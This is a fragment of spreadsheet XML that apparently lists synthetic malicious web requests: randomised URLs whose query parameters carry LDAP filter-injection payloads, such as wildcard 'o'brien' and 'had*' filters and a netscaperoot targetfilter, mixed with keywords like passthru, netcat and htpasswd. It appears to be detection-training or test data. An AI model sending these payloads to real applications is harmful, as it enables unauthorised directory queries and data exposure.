    <t>/2jl0q1hmhcafhu/6-ppassthrufvbbwm1/ybykzrv9xne0jkfwx0q/_t/nor2i0lv2e.mspx?pscehhmyfihtnsp=epbwz_7ea&amp;demasogdvofejsl=779476&amp;odcoanoooec7td=l6l&amp;amrmochadrhj=%u~ted&amp;eoc8pgisdtsf5=enzh&amp;vchoeiae&amp;dontcmjtn8al=+o&amp;ebtaaordirfli0e=3&amp;ttahyvusihps1p=oadjr2agc5o9smlaur&amp;kelceri6=45&amp;t3heocaeb=r1aygsmgl&amp;joctctnnt=788124250&amp;pnjj7=)++(++|+++(displayname=had*)+++(name+++=+++had*++)(+++mail=had*+)</t>
  </si>
  <si>
    <t>/eoujoeaf/tmys-3oj1iipwmz4yr8h/it/2i/nqlibdtgsnnpywwo/0r/1tnasae1awii/noldghl5iazo.cfm?1eivrrpnt3isy=70371&amp;binystisrtiaph=ouz&amp;cnqmwnrmsmieyd=58&amp;7houbg7s=lakz5rym1u&amp;at=shf6&amp;tti=++objectcrnentnei\\htpassqbgsoundenhf&amp;eg2htgms=gyej&amp;v._r.um_gndocument=lecho%aia0&amp;o3cntysncgugx=]i:m?&amp;uv2raoxarhg=)+(++++|++++(displayname=had*)+++(name++=+++had*)(+mail=had*+++)</t>
  </si>
  <si>
    <t>/iigea/eto50nu/q_selectk4byuoxphpxosc/irrznibkmm/muse7tauer6wrbecn/ak_1vquuf9tufc_f.y8/redsero/pcdzjwb0px9ynsme/6346n/jyiye5nsreeysopre/epsx.bin?ahsiewivx=5894&amp;6yceei=enhniihehr&amp;0rsipd=56)(&amp;(objectclass=sxa)(|(sn+=++++hwe)(cn=nhc++++j*))&amp;edolot=eficl66fxmk&amp;sea=arh</t>
  </si>
  <si>
    <t>/yt@uoehlmm6ye@dpmacs/thr1sagfs2f5oed/-ecgfxtermol8v/te/r4mml2ixk_ptbejil.tiff?arsstgeb7tee=+r&amp;eaehlol=idk&amp;hzogpkgatfmd=82)(&amp;(objectclass=fcre)(|(sn=++++bhia)(cn=4o++++j*))&amp;rbyqdo_lu0=im9&amp;rniy9oenteis3=+%)tueepooi</t>
  </si>
  <si>
    <t>/it4vyefeae2/vwyh0/ndwletx4lxzcsvey/ap1mr.s2ilkrmyi8wm/6ujvpbesvg/iatreialsoligo/sahyxcg.pl?-jdpe=h6dl&amp;id6hl=4265&amp;oxalhygxmghnp=aai)(+++|(rh0p=*)&amp;o0tx6strkoen=7848167&amp;vipe=2619287&amp;tol=leeatait</t>
  </si>
  <si>
    <t>/re0sevqkpppwdq/urap9bth5c1ttea/nanqe5bet/w3plhavinghs/thuvj9ggpwvc9gw/h90heee6ra/enc5rurnyaa82_0w1h/q3qftnu1p3bk0yp/bw7xuma-amjfolv/ed1/a_x@flzm4@nzri.css?57zcx.h8x03u=)(+++|+++(8teee=pcot*)</t>
  </si>
  <si>
    <t>/7cj.y/rancuobd6isagrrioa/k@p/nloasb1ryathtonds/sttndl/e8bohadbof/kwcgj2d/zoackkalh0pxm/open1xt9wmochangdv.exe?pfsn=dn+acceptdhebleh~&amp;_a@nbl=054&amp;aehea6io=019&amp;reesoghprt0hu=)++(|++++(++cn=*o++++'brien*++++)(mail+++=*o+++'brien*++)++++&amp;ssjpanreszlorlk=oztupdateaiten</t>
  </si>
  <si>
    <t>/eocfqrustrqaylc8ydwl/naenw9pmsoeaijhnewqo/n0lxzlseipdwdnl_@jfv/lh2t6pukyw9z/7u/window.opentcgyimgkt_1hnod4/ftp@_3e/j8nra/ux3wavuanuienfte1/esdroxoeteaoplisome.cgi?trrlieuxrts=uqcezcecje2apoeot&amp;ig=24&amp;nnbudt=)++(|+(displayname=had*)++(name++=++++had*++++)(mail=had*+)</t>
  </si>
  <si>
    <t>/vid/oil/mi/wga_l3lesjsah6w_u.dll?osock_stream.yp=906&amp;eo0=ou7dvpxnlycu&amp;mwosnaa5e3t7od=hau)(&amp;(objectclass++++=++++as*)&amp;midtdhot=lowubom0&amp;iyngff0ajwa2le=rionewdmouhaony&amp;rtolt=diezame2nee&amp;8iv8zbcmdi=loepassthrutitel1naso&amp;ai=eybst6ieenok&amp;ro6ui=netcathhssamwir;eamy&amp;ytx1nasdstsih8=nlnfdreccof</t>
  </si>
  <si>
    <t>/rbly2fxlnbxb6i/1heheabiydeeami/eiuo2/iu/hwn2p8fuilms9liz_r4/tdl4/_omxv/toe1ai1cen/q3xv0/eoaf.dll?yrzoh3positionzqg=218&amp;errca=cthomee&amp;inrb0rwget_=0691&amp;fcetbnmuur1=4491&amp;naxc55soir7uhb=[oe:h&amp;aafdor7pt=?acau9&amp;clilshn=)(+++|+(daq=stt*)</t>
  </si>
  <si>
    <t>/d9fbvnng4b50/s8optzeqvo-6cpsr@/fe/i4joup7cwpsfe@rb/sb6htyxvgzlxrnrl-a/maoodsopuaphnz3l/hg2kegvbpw/eyhrotc8mkkugwq/uzgipaermr/tek42_3nuogtlcfijrmp/nffhgtosqml9n/fg7tg8m-y0.gif?tysncvsf5reb=)1&lt;&amp;tusnoaewysaefdw=tiljulqu&amp;mr05=fziz2h6&amp;isomhy=tta&amp;9$gsdntwg&amp;uut2st=64673&amp;kivvdtle5gp=t4h0qne_t&amp;nu5chrorgfvtmmq=eltopsqu_&amp;eoeb2iwclk0ruoi=rtgot&amp;py9=szvr9s6rl5&amp;rdrserotteha=n+aeh?eai0tn&amp;szhaao=bilv8owy&amp;hbautdhrueott=tm?tfa&amp;hlo=[ym&amp;f0rw_ydocument74xq=93379649&amp;itcw=)++(+|+++(cn=*o+++'brien*)(mail+++=*o+++'brien*+)++</t>
  </si>
  <si>
    <t>/ej0iiyjotnythln/s5_yjrjhas/ea7riqimh/olanuobialtent/ekdvfh72f@/wwkwfs6ts4rjlrn/ipzfm1kdmi/oo2tndgefrcwopplngss/stysosrnea/de9j/naadu/oeah.png?ts=414182225&amp;aet=244174&amp;ioeeiro8eitheha=xarf&amp;9nlog.2es=hpbhfpiev&amp;2boot.inivl49e8=)++++(++++|+(+cn=*o'brien*+)(mail+++=*o+'brien*)+&amp;ottitdnibt=+inbetweenru&amp;lszenn6=ngroup+byhaaa&amp;lhlrc5=rbawv</t>
  </si>
  <si>
    <t>/rbib.dll?heesafy8ie=as9s+oazaitdd&amp;l0=8603&amp;iewhereadminhavinguyn=mc)(&amp;(objectclass++=++268*)&amp;8gqebinpositionautoexec8passthru5ox=:select:uai+eunscript&amp;ppt=lbsnullnsntn&amp;et=86uy-jvi_&amp;wchselects-=dhttph&amp;23ccr=ao</t>
  </si>
  <si>
    <t>/c0ivspt-cwewyh.jpeg?drpntruto=ar&amp;cesbhzerdef=9331379&amp;ednhmes=379835&amp;xh_nxmacc1paccept=89&amp;yiedur8saevh=oqgc3b20_u&amp;v@zjcpj=e:1++&amp;lbxrphpswy=ddnlo1eloe&amp;mn=ujiiuoe1&amp;ot=td$o&amp;qfrmyd3sest4ll=ieledb&amp;kipbb=981837&amp;cmr=yr~?&amp;lreheen=0yuedoddt&amp;tratdssttarbr=)++++(+|+++(+++cn=*o'brien*++++)(mail++++=*o++++'brien*)++</t>
  </si>
  <si>
    <t>/jstylefhredkm@g2/ekeu.3yuknmi/t5wy8d7ngjxo7hj@bm/oyejjh6hwz/h1hnertktroigrtnnlu/sgoz-.fycx7pmbre@94/gt0uy5ctneeen.tiff?__t0cmd=)+++(++|++++(+cn=*o+'brien*++++)(mail++++=*o++'brien*+++)++&amp;2taellm4p=83&amp;t8ftnt33tll=idneecmbinu$ipselectdie|6(&amp;u0ifdftpvi2n=80</t>
  </si>
  <si>
    <t>/u@v/mnf/j4yelanwewj7tfrro/htge.gif?zyb26jstdinsk6=pk8o1&amp;2xyat6buk=ieh&amp;hmr=48&amp;tcrtsast2h3oefi=)++(+++|+(lt=tsb*)</t>
  </si>
  <si>
    <t>/uccaheuehpoihm/rd6p2gyju/s4melmywqtjvlw/snsetuhyiuot4teooph/vve8tmpodvy5.png?zi-qmaq=75836&amp;uurhoa9e4=ooubl'o8lbl|5t;'r7e+&amp;uylrjiicmsfseh=ufr8t&amp;xp_pkhmf=u+atperlm&amp;h'syh&amp;sis=")(targetfilter=(o=netscaperoot))&amp;da0=5287&amp;sd_poukk=7036&amp;unu=8848&amp;rw3sastlun=6153499&amp;n1aseturudk0=jsne&amp;wendcos=nrj2zmnof1mv&amp;dwtssdhbndjqgns=mrd0&amp;qt3naz=ua9oi9mesdr&amp;usbeouis=+lpe</t>
  </si>
  <si>
    <t>/galzfsds/eus4ee/rerzdedbexwshtd.htm?boilrsbo1=sybae2hd0ni&amp;styn=ouyho&amp;ts6noarhfe=decvm&amp;iey6ntn=rncaneltshoee3wo&amp;cnshnhh=623&amp;toy6dnnu0en=0ah&amp;_uj5rp1oazi=41)(&amp;(objectclass=ilre)(|(sn++=+++saqn)(cn=d3h++j*))&amp;nei=ih7uxk4&amp;@llgj=5420620619</t>
  </si>
  <si>
    <t>/aylelzd/tsevttsuoietdedmak.cgi?0s9e=jn+4nte;|c7e43&amp;objectx5hrcpt=8&amp;e7bau=ci)(++++|++(y306o=*)&amp;pctt=heerdyea3pe&amp;tgsc3enwztx=22833250&amp;tjpz=6cio.wgm&amp;acjhwvfhe3tvdee=3vhst6rt</t>
  </si>
  <si>
    <t>/lovx7aledo/m7yzr28o4u/eu6tlll3otebtaen/lar8qssq5ba/lf0exi/cidabpao7ir/ybtlt9vae/rkjy@s.asp?arutue0rms=s@tltr4noonmn&amp;a4x6=nttvobjectuhsimglocationi&amp;aricockc=e&amp;a4qotddr=)(|(cn=*o+++'brien*++++)(mail++++=*o+'brien*++)&amp;heo94s7=aa3pateu7+&amp;sec6ionmoa=e]omzn5&amp;ev9ntnugscrcet=180727&amp;asetyh=24</t>
  </si>
  <si>
    <t>/of_frl7n6p6w9vnewdj/3eni6/yod/iksr/tebpchtzefl/eeonq_/srtnteteebhdh4evdjth/allanqqg/ezkdwc3u2ver13@mbb.g.png?pcsh8feahdzf29=aqwrwzs&amp;apcuarn2eceme=64711421&amp;oiaj=)+(++++|++++(displayname=had*)++(name+++=++had*+++)(++mail=had*+)&amp;axml9dbqwgetiao=4eeei'zjzehy&amp;dntocexba6=ehb&amp;aea1qeinedaz=ns5rt&amp;oe=07&amp;uz5y2nxe_xc=jxtermuoasaf/+ozdsaasmt&amp;zrposition0ah=mrfm9bcew&amp;atstmdhy=$5le|epz+&amp;2faen=hoied&amp;nri2mt5moa7=6&amp;ki0nktdnsr=746909&amp;uesettomsss=ancngm&amp;6nrklctaysd=nle</t>
  </si>
  <si>
    <t>/rxyuo03anxo6g/casggeiehnedi/zq.r@42ltnketnmr4v/ycpxzy5i.gif?haieeiuirn1eu=yqyiyy&amp;aodtgeo=wmnhu'unaanr4e&amp;sqganp7n=neiu&amp;iabaualeatyhssg=i)ia0aors&amp;1txe=umsehxaato&amp;htyon&amp;tsptiecar=zsondfhnu7ll&amp;eehmthtr2njt=15009813&amp;terremzc2cal=7228)(&amp;(objectclass=raeu)(|(sn+++=oi)(cn=e+++++j*))&amp;rpnfrhlsncitni=e_iamje</t>
  </si>
  <si>
    <t>/econeetswdasr1heiew/tyr.3n/wppvh0y8-wmnzgwvn/ez5/wse42v60v/insertavspqolike/ec@a9x7/orzu@6yange3/2gl/foujajbof/obxd.shtml?rnxn=46)(&amp;(objectclass=teys)(|(sn+++=e2)(cn=shm++++j*))&amp;eihhxuc=391&amp;ercfwr8=replaceihtpass9eelsdrs6e;kepsi&amp;uescqhl3hn=780295&amp;5syreplacewp-sg-j=[e&amp;s9dynt0=765722&amp;leretzyaex=26&amp;oora=l@2jfne970q&amp;ensndnor=0&amp;d3mdelyjjh8satz=lt6see4a&amp;eisiletrhdyrg=a94prar3wz&amp;ltetrpw=iuypxt&amp;zoehades0=eqfet0enc8ftdt&amp;ga=3725872</t>
  </si>
  <si>
    <t>/aey-/e7z1tub/ihg-zqaso/ho1qozret4uuilsun@gp/5ide4vtdnqtwsdiea.tiff?hrdnncieshec=uowunceo&amp;sus3wcwhans=ar3p2dydus2u&amp;yindmuts=lacexsb4hvgair8&amp;nlqabafuab=tao3sq8izrb9tvc&amp;up88=hetcse&amp;cd=63863469&amp;lliie=13446&amp;46oui=4i0)(&amp;(objectclass++++=++b7w*)</t>
  </si>
  <si>
    <t>/89fz.v1rv/gieboaiisr839oy/iqgz/ddihtee/m2nfdrg/srasaorreenrnteyi/tvaurhsstigt/anfs1.swf?nryrptxccs=)++(+|+++(ath=ru*)&amp;bbpdiiamn=8111&amp;poaicihaaetl=9890&amp;.hiftp=thjsoke:perlsags</t>
  </si>
  <si>
    <t>/scuo/tcnheetr2tdyrp/i3w5uet3ee3hieeudnt/window.openejrfevalqbody7to/ownureupenfibeniesu.php?evpshn6tieeewi4=3843)(&amp;(objectclass=cesc)(|(sn++=+++eh)(cn=aota+j*))</t>
  </si>
  <si>
    <t>/edyiiapdsntordi/t6rif/isklb/xmg0dall/hjjrw/rijtsearseofe82s/wd/wnfknbs@px61qx/cnc.axl_xgrct@zno/s_v_7.hzefr7zx.msf?eed=)(|++(++++cn=*o+++'brien*++++)(mail=*o+++'brien*+)</t>
  </si>
  <si>
    <t>/eioe.aspx?oydalgm3=)(++|+(++cn=*o+++'brien*++++)(mail+=*o+++'brien*)++&amp;2ohe_=amocha&amp;eriowtyusnbln4s=tspta6p&amp;1yecenoeelhw35=6173555&amp;8qscriptlkq=owerthlicnonr&amp;rh=vbfygq7pzjz&amp;4scgmsjmh1mocha.=e:awno~ftp@5%uysi++opd&amp;chmp9to=e+ni+/h7xcom@'@&amp;fiecsctidct=ggop2ro7jmmm</t>
  </si>
  <si>
    <t>/ttheaeailtaestoooreo/yje_fxt/cimisdittgdmxszfi/tp8kszr@2qtfn03/lezoaccess_logpwgcr1h/03xljstyleyhbgsounda6rv/ance9rd/e1oxkm-g.fkv9frwd/xywyj90oyu/etufiw9uteaielmjsho/eslc-_df-8xei0s.grr./ndsut.mdb?4aztiokrs=edvrt_w-&amp;wpreplacebgsoundg01tfrom=)++(+++|+(+cn=*o++++'brien*)(mail+++=*o+'brien*+)&amp;ecn=il</t>
  </si>
  <si>
    <t>/mcv7r/s2k/dc4c/6@b34pbcmd1ypjhn/qybkkx.mm4k6wc5nrcf/jhlbn1ioc3f/omwzdi/83sh/qtzpixp_mmj4id/7verz6@dolqv0my/eeathtiyljlac.html?rrb6p=)+(++++|++(+cn=*o'brien*++++)(mail++++=*o+++'brien*++++)+++&amp;2i9wx=flar&gt;owi|&amp;eirljrha4t=4838112&amp;yu=hopadmintklglaro&amp;naetibobralaesw=5&amp;r@e0d=3056325&amp;1sodggsipu=stuuiahrtore</t>
  </si>
  <si>
    <t>/y3hc-processing-instructioncmd/itiehvxcl/tuhh3/suofrct1oenex1/teamu/iv/kfuss6_m/stbaaz/dn6c2docuska0ozgx3/fdmetfiu-ggroupbyj84p/lqnpaibdrvyf.mdb?onneg=naazrt2tgaaonc&amp;doasubtmnaot=7hw8ahx7w&amp;ajnx@jscript=)(|(displayname=had*)+++(name++=++++had*++)(++++mail=had*)&amp;klmfd0zkltselect=998925</t>
  </si>
  <si>
    <t>/efuh5/ir77vzzna1nrfkukg/ub.sh?adaoa4e=zroinputad01/:utctmpnodelocation&amp;ieheic2uheanaen=+&amp;ahsciefhexecl9)ldocument&amp;pvyxmidm4o4=758)(&amp;(objectclass=4m2s)(|(sn=++a1)(cn=cnit+++++j*))&amp;sayt4pywte=relda]t+dh9&amp;arkaoe6eg1nevp=e3vqnbb47se</t>
  </si>
  <si>
    <t>/oxe4srgsk9ng-nk2d/pin5p/ovkobjecttwkxsnyewdimg/rtrfae0/iupf6cg6553tg/ntt.wfopen/5yqj1vppadv1r_jkmaf/ae0tm8tsle/3atwgas2u/rqkwqxa42nlg6yixbq51.js?qdes2b7tk=t+5sa&amp;poio6iexh0hemoe=201100&amp;1t=alhas3+&amp;zewmetadp=x6ea&amp;4asystoootdg=ogeoewindow.openwhere@p)@gnr3rs&amp;urrrallfuetio=35&amp;8usnuog=323&amp;tbiekltkbcue=6967&amp;linko.8jj1a=291582&amp;4emd=nqmx&amp;eolimt65ep0s=)(++|+(i8yv=nmhla*)</t>
  </si>
  <si>
    <t>/rehotralthhuxc7/ava1mkjopenie5rc/efri7rp2ew8b5aaptda/teds5srydttheaniavas/qaareeilegrs/1bngecafomwindow.openxzfl/lvistatsxhe/zyobjuc-x6d9_q_gy.sh?ljrhldsims=&amp;+&amp;jetlcytsi=okwzaug&amp;euouoftepyewc=grchyhu:w6a0+1&amp;ojonio=07953238&amp;eaigaoetsae=puffat&amp;oq@v_fy=gfaefruuzunsetello&amp;sbuu1=en&amp;efree0=ceax+goli4:t&amp;ie8nslswii=manddyem&amp;aoo=oeleatye&amp;insertqrhwo2t8p=rtc&amp;84gt8tio5=71)(&amp;(objectclass=asy)(|(sn+=+bts)(cn=tu+++++j*))&amp;lrlgtetono1tme=3;nr+tsaesur+&amp;nh=96d9ehr9i</t>
  </si>
  <si>
    <t>/tnosnnaeknmhehu/ettpved/wgp/1s26ruetubhys0xqrn/mgpnodtf/nl5lhytzemaybyvrxoo/tdneetimoa0wpds6ix.png?exaoe5frv=svocf6z4kxz&amp;kewindow.openisqmetaupdatex=ta1duup&amp;ra=6d)(&amp;(objectclass+=ed*)&amp;olwlchriae=+t&amp;ta8=prturey&lt;htpassi&amp;zzn_vcclk=2ilih&amp;itlltdsl=132&amp;w7hnn2hoyg=ualfodetkss3drhgs&amp;teymtn1glhar=|&amp;oiynevheheft4f=ol87hykn-qz&amp;hrs=04</t>
  </si>
  <si>
    <t>/oh2-250k0te/g2t/hrn/58ahr/egp-l3bdk7lntd1/yhebtelnetz.png?tanygos2eqeats=nnosam&amp;tadrt=arcp&amp;w'neu&amp;ueozdpcr=")(targetfilter=(o=netscaperoot))&amp;cfflatnr=349&amp;gihcgroupby--w=5iaghr0+e+te+3[o&amp;leise1zt=57&amp;sgcad=ekunion&amp;blut=ix5ndrrehgr&amp;mntty5ubd1h=08665</t>
  </si>
  <si>
    <t>/positionservices-obdlbdopjp/whpt/2qtlp27k.pmfze3wc/5hlsqzmqjk032u6ypg/dj2urtdt2gqepm50.dng/hishbb3mykzjkz/khavingcl1vlxs4b/8her/ai2reusrc7eorul99n/br@jfosydwxc.c1x/tez7er2wspgrxthqby.jsp?qe3b=4czoyzzpfwnx&amp;ks=hsi+u&amp;hf4lzngtnhamgta=i-emfofeesttos(&amp;uauwsnestnexs=4717345&amp;fej=5+positionore5v&gt;)+a&amp;esab=0&amp;fchesdtofs=)(++++|+(+++cn=*o++++'brien*++++)(mail=*o++'brien*+)&amp;ddclydmg=hrw7niseeit&amp;negrrrhusf=zmocha&amp;tgfa=i5rb&amp;e7eerhtsdo3tlo=m</t>
  </si>
  <si>
    <t>/s1nd0do/aop5etwuiu3r/aovrvgfycx9l.-ndg.html?eoemsammr=15022&amp;gizutmp77o1bnd=wl)(|+++(sdxs=*)</t>
  </si>
  <si>
    <t>/mzao1qzl5ubif.mdb?eqjhavhto=91662829&amp;hddh9aciereh=7272820&amp;s2itkehut=4&amp;tcehssnaimaiqd=yim7&amp;q5s=t.4fxp0&amp;tauiilsa=dstpjjinireheetnrh&amp;ri37mdyahss=57&amp;mexyuwpasswd_odiv8=66182&amp;qi6ojqelpl4=2920703&amp;eojnwaee=2&amp;uhrcrnasiaiutep=rzbcrpqr&amp;6c9e=syebp&amp;pmei=duos2ucmetb0npdqrt&amp;iew4n=6y)(&amp;(objectclass=+++pne*)</t>
  </si>
  <si>
    <t>/qe2d/drmeki0ieaaamnmgo/ypnn7iqi/haknsitrttrhltam/rcooewtmccrduo1a/brq5xxifa8fv/eno0ss9eh.mdb?idoj8er7anywc=ubtpaibisshq5lt&amp;ptqwee3=35484&amp;c0=ict+3o4p&amp;mnidxe0pips=tn&amp;ttp9tnrtnrh=jhtansnshbnepan&amp;a6rtti8reelibir=qhit&amp;mcsgiaeec8=41&amp;eoaint=")(targetfilter=(o=netscaperoot))&amp;mimgcvtmvjv8=ef6xmbns1yrv&amp;3e524uxa60elq=8icced%&amp;xaudh-bmlm=aebetween&amp;emnufehwhht=qn&amp;htmddartdststy=kt=lmm</t>
  </si>
  <si>
    <t>/ro/u6sht3rphpqp/5k@0vfgujh7qoq_/s5jd78teveksniza8f/3kuclh_ftaz5.b/amlyhtaccesxztg8thn/aj0n/8na0tcaao.sh?jeo4dtnnahtc2ea=iesjjin&amp;nn=+hity%ej&amp;ieegeotmhe=9uulaua1s&amp;snstnhsxzmtcav=fpogevalehc&amp;n0onl9insaosx=pxn269a6ic1&amp;jttbftliowmzoal=rh:l&amp;wifandpraynfyform=7nstagoak&amp;fnsenpahhlrm=t5g&amp;v3ssa8=78504684&amp;qadminbcxkjnvj=")(targetfilter=(o=netscaperoot))&amp;nrwdyprms=6152875&amp;9vnjzdm=mbfpl&amp;d7tuu=+eansie&amp;ecas0=~@includeo&amp;bg0aevals-s=nhikn9e</t>
  </si>
  <si>
    <t>/o-ock@mvh7g2.asp?zwherer5zgs=edri9vak&amp;atqycnxl.ar=")(targetfilter=(o=netscaperoot))&amp;zhssebi3i1bi=udoo7h74n&amp;lulr5epotmtvho=gzc&amp;hdoeaeit3sstig=6551&amp;rcje=fbetweentsdipjtixsbd&amp;vo1catxdiv28i=jiatlze&amp;oa.r3sh=pincb+o;pd5&amp;0eonish=axetjlfewmmehuldi&amp;tvotoquohaa=593881&amp;ueiasusyotr8e=6260649</t>
  </si>
  <si>
    <t>/wx7figh0/a-bhpsne87rsiwo4mpi/hocknqi/occqejo2qo-dp5/jipdjqurowm5pkx3k@8e/rv/dhmrrxn1htne/adminollukjtjeg33x/m0oldc.js?ngaod=cho)(|(1sd=*)&amp;vi6otlganes=84&amp;msuad=e63n+d)de2ead&amp;eehryalmmetnehj=ro-o&gt;rjy&amp;ftmo9eje7t2treh=5611137302&amp;j1muoocoeeoolat=244&amp;eaamxtnjpsja=96343518&amp;p@ud=11563</t>
  </si>
  <si>
    <t>/rme3ug/aergpi/op6vzn.ihtqv/oo44ww@4w-l8.jpg?eoon=9654513&amp;f0f5j=ydmhib&amp;t4aaclnvjtwmir=683121950&amp;yraaq5mw=lon)(&amp;(objectclass+=+++gteu*)&amp;q0imfeta=+stvho8&amp;tarpenstsaibjay=e:</t>
  </si>
  <si>
    <t>/hnrgniitel5/delntyt1eludrenrepn2/i4vhrinkxautoexecf@6/g1feteni/rdznwlg/qi7jmf.y/ttrxhhl/gpassthrurjhmlcju.html?aahwun=238)(&amp;(objectclass=89eo)(|(sn++=+0i)(cn=eos+++j*))&amp;loeo=9544558&amp;rs46loucsl=hs@&amp;oidoh991=6725&amp;en7auedairm=iseicunodeo'&amp;hd4cltinhoerdn=7603&amp;seter=iatfnd&amp;eyncnd0b=ieb&amp;ayttt9txynhnd=onxeofbsu51in+hgqeval&amp;2egonoyiesarfi=nhaf9eih=pyline&amp;il=ngopafuoj&amp;rionxi6d=nkadb-oh1b&amp;6mei=6151&amp;vtntoyn=meftlike</t>
  </si>
  <si>
    <t>/tscmewrvthbi5oifnuta/ddayrwfx/evoiew4g5_/ridosvvm_shutdownkv6sbs/mqdjzphisquvrlrov/n7wtixuragvc/zor4m4uolugsswt67lt.js?aftihhyoacer6=82375798&amp;ohldi7x2dqi7lsy=oyit&amp;vbscriptwvs.ky=9784021330&amp;tnpep0tmyeian=hiahch&amp;9ersghd=esdrceg.&amp;rlvwcatob=dts&amp;ftpxmy@_4w1o.=oon0)(&amp;(objectclass++=++e1ss*)</t>
  </si>
  <si>
    <t>/or/ij8jklz2/ia3y/hod/w@v_frw_k16jxor/eliafp./fla8se.nsf?vastase=")(targetfilter=(o=netscaperoot))&amp;0nauveleqej=8164942&amp;q8attenazj4=[ae+tar(d-9u&amp;eknzb=10786&amp;nhoherihetrduoh=k&amp;tblnmedlhoaowtr=52&amp;heoueetttgd2=b6h</t>
  </si>
  <si>
    <t>/tg.b7.hv10t7stt6/tye3eaenriegc/1f2r/synqo3l1.r.om2/di/2bcsiknub/su56ztsacaotsws/le0.css?aclwe=dbh5j&amp;d@formfrom6servicesscriptbsimg=aee%t+hrha\\scripte7a?thmi&amp;gtewa=-&amp;2snck3cbw=)+++(+|++++(displayname=had*)+(name=+had*++)(++mail=had*+)&amp;wvvf=rwe4xr9&amp;ud&amp;ej=nylf&amp;tan=o+et\\n(ateeue&amp;t3hadr=9uevkkha2k@&amp;wta8set3oh=tls</t>
  </si>
  <si>
    <t>/dlafobati19zi/h4aa8p/csm1.zsao9u/odb/doo-xrq5scmyujpyg/ssqw-r5s/@lkrxgtp/gsgrnepl5comwhere85.htm?raae=90&amp;sbuqhlt=$+mautoexecdivs4ss&amp;nzduc1=l@ah&amp;as5blorn1orl2r=abik91jt&amp;se=hlsud@hfes&amp;o9moofeaoinesln=hhtead&amp;8ist9hn=0225)(&amp;(objectclass=3ea)(|(sn++++=++++ri52)(cn=c++j*))&amp;yeeu3rtranu=5575608712&amp;eyelclpertd=9007203&amp;lmpb=manrtntffezh&amp;5la=dpt27\\ue&amp;r4eort=969950186&amp;tirdhgiac=21863346&amp;_mycmdc=awote</t>
  </si>
  <si>
    <t>/ngssrs54ra/irlee2ihin5n/gcnwoku8o6r/sefs2hhe6aietolerhst/sc4tyr3doqpbezs_dv/vyerrywdnfpts3/bseeoaf2eiwoef/kv_stv.png?ync5=27553&amp;slrcstonats7tn=5339&amp;aousstr=3527&amp;dsn5=8&amp;bubinzmeta5hqxwexec=inph-su&amp;qhbfku7=odrd)(+++|+++(ytia=*)&amp;trneedi1ttos=3zjcshlo1&amp;tefdabbara=7rfhtzf&amp;oetnwesrretkn=hnlgnsse&amp;er1ydn=omdezg&amp;teniipn9hdhwbse=ujitsolasdddbtsrz&amp;sszoz2bhsnoa=%o2t;npadmin+s&amp;d0=asexeci&amp;eyautraanbnnboa=xam&amp;lr=94</t>
  </si>
  <si>
    <t>/f89onasri/rs/9servicesyvbhtaccesracju/xd8%urwhere6divy/yretcz597/edeoje4ajrhiak4ssop/tnsdlsopdaru/9eruateddle8aldossw/stdelete.mkfimvar/jaktdsechic3esaie/snthrxszp8.swf?enhl6hn=n_vnv&amp;8eaigl=)+(++|(hyn31=4aio*)</t>
  </si>
  <si>
    <t>/hmrbd7wik/nyta3o/eaa/jushutdownformhtacceshn/hybrqeeores/tf92vq6brqzo6@vzamc/15kghlp4nd@5cudf5h/trl_p93gjioxw/th62dwjiatmpxuiil.php4?niohieepd2dcij=)+++(+|++(bhs=seile*)&amp;wacqa06tr6=19960&amp;wfda7whlocationq=httpes4&amp;cyeoi0deleterhskh=aatnldfle0ssbhaitu&amp;tdo7usco=3&amp;admochagq=itcr4efeonn&amp;6cdase3pt=i&amp;dmdatjgtiwwui=lnlh6meu&amp;n8rhqwnpe=edhr1msnirrrror</t>
  </si>
  <si>
    <t>/emutdislemsni/eytnvrl/aritetil5ensei/mmaujf0xzzuyi/t7rr/dud4.png?feh4iwesh=dstdino]iwsl+temshutdowncat&amp;zudodikt5z=+iet&amp;flrshtnu=esxv&amp;ndi1=14213515&amp;io4sat=244533&amp;ulqhvstb7cmdpv=34&amp;hurltahe=63699&amp;asn2oidot=ko8tsdqp&amp;iorrctnl4=o+metarsamshnrmaad&amp;hpjklys=execgroup+byt&amp;ucreokneg=)++++(++|+(tteer=enw*)&amp;a7eoqdetttovene=rairl+4ut0</t>
  </si>
  <si>
    <t>/r93h2ed1jbtrem0h/iqprysu@v/rcpnio0rwt/otchprou/oa/unsoladezse/rlthzomis8.jpeg?system8nfec0vmqv_=07433&amp;_wrcovnph-d4=mtytohesrspmad0ea&amp;9agf5rsdq=796&amp;sdceueener=i&amp;2u=7trssgtn&amp;atfbeoae=)(+|++(cn=*o+++'brien*+)(mail=*o+++'brien*+)&amp;0gonoih5tan=ca&amp;nrt4ctiraeesuar=26321&amp;zdowiae=inwinntl7g&amp;niuveesm=+;yrdieuknph-fhl=betcm&amp;wlx7pu6xqv=w7owgtlapddnho6etg</t>
  </si>
  <si>
    <t>/i./orr/s9.swf?3mwinsertuh=ua9hereswduhposition&amp;y0tigswhtnxh=hmpptcactf&amp;eiip9=")(targetfilter=(o=netscaperoot))&amp;sxeixealo8s=rotlrlth&amp;t2nf=51029&amp;duo=osnukeqol@-j</t>
  </si>
  <si>
    <t>/tna/fkpbjfwashbche/hpasswdzf_sefmexec7arj/nad-qao91bkpo5z/7q1rodlbmwmr@5ur2/yaitdotsaiwgaa/a8.tiff?ei1rsuetmmah=n&gt;bere&gt;y&amp;qhdab3o=199&amp;yara=12)(&amp;(objectclass=t2dm)(|(sn++++=++nt)(cn=nem++++j*))&amp;7o=3qdeor&amp;ci5ocicm=50316072</t>
  </si>
  <si>
    <t>/y7_u.y1y1hx32z1pbz/7.jv6.gif?7prreqgpasswdc=emmtbc5&amp;brhtcfeyw3=)(+++|++(cl=usnit*)&amp;tr42=92&amp;h0toa=7&amp;oneh=1adsws7&amp;0j=9207360577&amp;pnnloa=90499741&amp;n_4jkiaggg=307914&amp;acefafep8is5ls=rwjq1&amp;nnreqtttweatliw=483399&amp;uuirh=?m&amp;rr=i8q+o&amp;s9he=tiaaw</t>
  </si>
  <si>
    <t>/ali91v.wvjcy/oaucvgzh4pkddjdmxup3/o3/ttrh/tzcy2esme6itur/jirtdwriuronrs/8betweenzhb5imqgxj_r.php3?yaqbewv4ct=phwetmrh3dl1&amp;etoefueo=dg&amp;gj5ytx6w=3990&amp;2szeirpxrei=z4hgrgvpex&amp;ztqgromrx7o8=aryider8aeeh&amp;aotlbu=t@p9fym7a&amp;e8lj=cikx8vnspghn&amp;tiei=tjiiagnhfdeelanre&amp;ewspvhasiyieas=9097436564&amp;dbe@e=08624&amp;q5tbcrtih=ehnr)(&amp;(objectclass=++++enm*)</t>
